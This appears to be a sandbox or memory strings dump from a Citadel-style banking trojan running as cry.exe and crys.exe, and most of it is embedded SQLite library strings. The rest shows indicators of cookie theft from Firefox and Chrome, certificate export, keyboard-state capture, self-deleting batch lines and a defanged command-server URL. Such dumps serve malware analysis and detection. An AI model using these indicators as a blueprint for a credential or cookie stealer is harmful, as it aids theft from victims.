%s = "%s";
update.exe
config.bin
PR_OpenTCPSocket
cit_ffcookie.module
cit_video.module
%ds~U;MM
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
6;:5;66"
,1;(,; = 1
<! 8< ;-;
'472%9,{
F@ICTQ}cRTWAunO}mmts}NX~csgzn~)[jzyemer\]ika
8/3.xae4LOa
6 !26!1'1!
hXXps://
HTTP/1.
facebook.com
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
_getFirefoxCookie
hXXp://VVV.google.com/webhp
SSShD
SSShXe
SSShye
GetProcessHeap
CreatePipe
KERNEL32.dll
MsgWaitForMultipleObjects
OpenWindowStationW
GetProcessWindowStation
CreateWindowStationW
CloseWindowStation
SetProcessWindowStation
SetKeyboardState
ExitWindowsEx
GetKeyboardState
MapVirtualKeyW
GetKeyboardLayoutList
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
SetViewportOrgEx
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
InternetCrackUrlA
HttpAddRequestHeadersW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
WINMM.dll
PSSSSSSh
3$3*30383
6|7k7u7
9 :1:::@:
42>204:4
sXXXX
nspr4.dll
chrome.dll
\StringFileInfo\xx\%s
ntdll.dll
kernel32.dll
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
Global\XXX
SysShadow
Chrome
Firefox
%Documents and Settings%\%current user%\Application Data
{E90C4A0B-BD46-7BBE-341D-3959D67D1D48}
%Documents and Settings%\%current user%\Application Data\Tyawy\foed.qid
%Documents and Settings%\%current user%\Application Data\Tyawy
foed.qid
Global\{7F77F82E-0F63-EDC5-341D-3959D67D1D48}

cry.exe_372_rwx_041E0000_0006C000:

<1%u3
t8It.IIt#
.FGyO
FTPj
YPSSSh
9t$Lt.VV
,4,56,789
GetProcessWindowStation
3.7.13
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\
-cmd command run "command" before reading stdin
-echo print commands before execution
-version show SQLite version
%a, %d-%b-%Y %H:%M:%S GMT
isHttpOnly
HttpOnly=YES
HttpOnly=NO
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
CPU Time: user %f sys %f
(%d) %s
%*s = %s
%-*.*s%s
INSERT INTO %s VALUES(
%sNULL
/**** ERROR: (%d) %s *****/
Memory Used: %d (max %d) bytes
Number of Outstanding Allocations: %d (max %d)
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Largest Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Lookaside Slots Used: %d (max %d)
Successful lookaside attempts: %d
Lookaside failures due to size: %d
Lookaside failures due to OOM: %d
Pager Heap Usage: %d bytes
Page cache hits: %d
Page cache misses: %d
Page cache writes: %d
Schema Heap Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Fullscan Steps: %d
Sort Operations: %d
Autoindex Inserts: %d
DELETE FROM sqlite_sequence;
ANALYZE sqlite_master;
INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');
/****** %s ******/
%s ORDER BY rowid DESC
/****** ERROR: %s ******/
.backup ?DB? FILE Backup DB (default "main") to FILE
.bail ON|OFF Stop after hitting an error. Default OFF
.databases List names and files of attached databases
.dump ?TABLE? ... Dump the database in an SQL text format
.echo ON|OFF Turn command echo on or off
.exit Exit this program
.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.
.header(s) ON|OFF Turn display of headers on or off
.help Show this message
.import FILE TABLE Import data from FILE into TABLE
.indices ?TABLE? Show names of all indices
.load FILE ?ENTRY? Load an extension library
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.mode MODE ?TABLE? Set output mode where MODE is one of:
column Left-aligned columns. (See .width)
insert SQL insert statements for TABLE
list Values delimited by .separator string
.nullvalue STRING Print STRING in place of NULL values
.output FILENAME Send output to FILENAME
.output stdout Send output to the screen
.prompt MAIN CONTINUE Replace the standard prompts
.quit Exit this program
.read FILENAME Execute SQL in FILENAME
.restore ?DB? FILE Restore content of DB (default "main") from FILE
.schema ?TABLE? Show the CREATE statements
.separator STRING Change separator used by output mode and .import
.show Show the current values for various settings
.stats ON|OFF Turn stats on or off
.tables ?TABLE? List names of tables
.timeout MS Try opening locked tables for MS milliseconds
.trace FILE|off Output each SQL statement as it is run
.vfsname ?AUX? Print the name of the VFS stack
.width NUM1 NUM2 ... Set column widths for "column" mode
.timer ON|OFF Turn the CPU timer measurement on or off
Error: unable to open database "%s": %s
Error: cannot open "%s"
Error: %s
PRAGMA foreign_keys=OFF;
SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')
SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()
import
Error: non-null separator required for import
SELECT * FROM %s
INSERT INTO %s VALUES(?
Error: %s line %d: expected %d columns of data but found %d
SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1
Error: querying sqlite_master and sqlite_temp_master
Error: invalid arguments: "%s". Enter ".help" for help
Error: cannot open pipe "%s"
Error: cannot write to "%s"
CREATE TABLE sqlite_master (
CREATE TEMP TABLE sqlite_temp_master (
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
%9.9s: %s
SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%s%-*s
iskeyword
ambiguous option name: "%s"
Error: invalid testctrl option: %s
%d (0xx)
Error: testctrl %s takes a single int option
Error: testctrl %s takes no options
Error: testctrl %s takes a single unsigned int option
Error: CLI support for testctrl %s not implemented
SQLite %s %s
Error: unknown command or invalid arguments: "%s". Enter ".help" for help
Error: near line %d:
%s %s
Error: incomplete SQL: %s
%s: Error: cannot locate your home directory
%s/.sqliterc
-- Loading resources from %s
Usage: %s [OPTIONS] FILENAME [SQL]
FILENAME is the name of an SQLite database. A new database is created
sqlite>
SQLite header and source version mismatch
no such VFS: "%s"
%s: Error: too many options: "%s"
%s: Error: missing argument for option: %s
Error: unable to process SQL "%s"
%s: Error: unknown option: %s
%s/.sqlite_history
SQLite version %s %.19s
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
zcÁ
O{%Documents and Settings%\%current user%\Application Data\cry.exe
GetCPInfo
]<%XkG
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ole32.dll
ffcookieextractor.dll
_getFirefoxCookie
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
888816666554443
6666554443
!6666554443
%AppData%\Mozilla\Firefox
\profiles.ini
\cookies.sqlite
Kernel32.dll

cry.exe_372_rwx_675A6000_00003000:

.Qg<-Qg
*Rg`.Rg|)RgL Rg

crys.exe_1460_rwx_012B0000_0003B000:

.text
`.data
.reloc
%s, u %s %u u:u:u GMT
HTTP/1.1
HTTP/1.0
hXXp://
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
update.exe
config.bin
PR_OpenTCPSocket
cit_ffcookie.module
cit_video.module
%ds~U;MM
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
6;:5;66"
,1;(,; = 1
<! 8< ;-;
'472%9,{
F@ICTQ}cRTWAunO}mmts}NX~csgzn~)[jzyemer\]ika
8/3.xae4LOa
6 !26!1'1!
hXXps://
HTTP/1.
facebook.com
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
_getFirefoxCookie
hXXp://VVV.google.com/webhp
SSShD
SSShXe,
SSShye,
GetProcessHeap
CreatePipe
KERNEL32.dll
MsgWaitForMultipleObjects
OpenWindowStationW
GetProcessWindowStation
CreateWindowStationW
CloseWindowStation
SetProcessWindowStation
SetKeyboardState
ExitWindowsEx
GetKeyboardState
MapVirtualKeyW
GetKeyboardLayoutList
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
SetViewportOrgEx
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
InternetCrackUrlA
HttpAddRequestHeadersW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
WINMM.dll
PSSSSSSh
3$3*30383
6|7k7u7
9 :1:::@:
42>204:4
sXXXX
nspr4.dll
chrome.dll
\StringFileInfo\xx\%s
ntdll.dll
kernel32.dll
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
Global\XXX
SysShadow
Chrome
Firefox
%Documents and Settings%\%current user%\Application Data
{E90C4A0B-BD46-7BBE-341D-3959D67D1D48}
%Documents and Settings%\%current user%\Application Data\Tyawy\foed.qid
%Documents and Settings%\%current user%\Application Data\Tyawy
foed.qid
Global\{7F77F82E-0F63-EDC5-341D-3959D67D1D48}

crys.exe_1460_rwx_037E0000_0006C000:

<1%u3
t8It.IIt#
.FGyO
FTPj
YPSSSh
9t$Lt.VV
,4,56,789
GetProcessWindowStation
3.7.13
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\
-cmd command run "command" before reading stdin
-echo print commands before execution
-version show SQLite version
%a, %d-%b-%Y %H:%M:%S GMT
isHttpOnly
HttpOnly=YES
HttpOnly=NO
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
